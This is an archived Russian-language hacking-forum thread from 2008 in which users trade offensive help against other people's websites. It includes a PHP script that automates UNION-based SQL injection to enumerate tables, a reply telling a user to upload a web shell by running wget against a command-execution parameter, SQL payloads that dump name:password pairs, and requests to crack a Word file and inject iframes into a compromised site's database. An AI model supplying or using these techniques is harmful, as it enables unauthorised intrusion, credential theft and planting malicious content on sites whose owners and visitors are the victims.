ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.05.2008, 16:10
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Почему нечего? Угадывать и ещё раз угадывать:Р.
|
|
|
16.05.2008, 16:12
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
nu eto esli v printzip postavit' poimet' site..
|
|
|
|
16.05.2008, 17:12
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
Basurman,
Она правильно не определяет, нужен простой код пхп...сам писал и не получилось что то.... мож кто подскажет где ошибка???
<?
@set_time_limit(0);
$strverno=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.users+limit+1,1/*");
preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$strverno,$m);
foreach($m[2] as $s){
}
$fd = fopen("kol.txt", "r");
while(!feof($fd)) {
$ma=trim(fgets($fd));
$str=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.".$ma."+limit+1,1/*");
preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$str,$p);
foreach($p[2] as $k){
}
if($s==$k){
echo "ok, exist";
}
else {
echo "error";
}
}
fclose($fd);
?> |
|
|
|
16.05.2008, 20:15
|
|
Познающий
Регистрация: 18.02.2008
Сообщений: 72
Провел на форуме:
340286
Репутация:
83
|
|
Скажите плиз какзалить шелл имеется доступ к cmd серверн на linux'e , какой запрос составить чтоб закачать шелл http://www.site.com/news.php?cmd=команда для заливки шелла.
За ранее блогадарен  |
|
|
|
16.05.2008, 20:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839
Репутация:
1502
|
|
1)путь = pwd
2)wget /Pпуть http://site.com/shell.txt
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
16.05.2008, 21:41
|
|
Новичок
Регистрация: 02.02.2008
Сообщений: 3
Провел на форуме:
28476
Репутация:
0
|
|
Люди скажите плиз прогу или как вопше мона взломать вордовский фаил!? плиз очень надо! и если прога то дайте ссылку!Плз
|
|
|
|
16.05.2008, 21:56
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
Если при вводе запроса
forum=-1+UNION+SELECT+1,CONCAT_WS(char(58),name,pass),3,4 +FROM+users+WHERE+name+NOT+IN+(0x74657374)/*
выдает
?????????:123456789
то с помощью какой функции можно преобразовать ??????
плиз
|
|
|
|
16.05.2008, 23:00
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
convert(concat(name,0x3a,pass) using cp1251)
__________________
|
|
|
|
17.05.2008, 00:21
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
convert(concat(name,0x3a,pass) using cp1251)
непрокатило но дальше я понял что делать +
|
|
|
|
17.05.2008, 01:06
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
Есть доступ к БД, есть шелл, нету прав на редактирование, название бд не mysql, что можно сделать, я как вроде искал куда можн оприсабачить линк\ифрейм(тоесть если страница берет из БД что то туда линк или фрейм засунуть) но так и не нашел может что нибуть можно сделать еще?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
